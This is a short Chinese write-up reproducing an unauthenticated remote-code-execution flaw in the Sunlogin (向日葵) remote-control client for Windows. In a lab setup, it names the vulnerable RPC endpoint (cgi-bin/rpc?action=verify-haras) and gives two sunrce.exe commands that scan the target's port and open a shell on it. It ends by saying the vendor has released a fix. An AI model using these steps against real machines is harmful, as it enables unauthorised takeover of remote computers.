漏洞简介
向日葵个人版企业版均受影响 for Windows <=11.0.0.33
SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce
测试向日葵客户端漏洞版本:11.0.0.33826
复现过程
环境说明
攻击机:192.168.0.23(Window10)
目标机:192.168.0.24(windows2012)
测试向日葵客户端漏洞版本:11.0.0.33826
扫描受害机漏洞端口
sunrce.exe -h 192.168.0.24 -ps -shell
获取受害机shell
sunrce.exe -h 192.168.0.24 -ps 49341 -shell
漏洞修复
厂商已发布了漏洞修复程序,请及时关注更新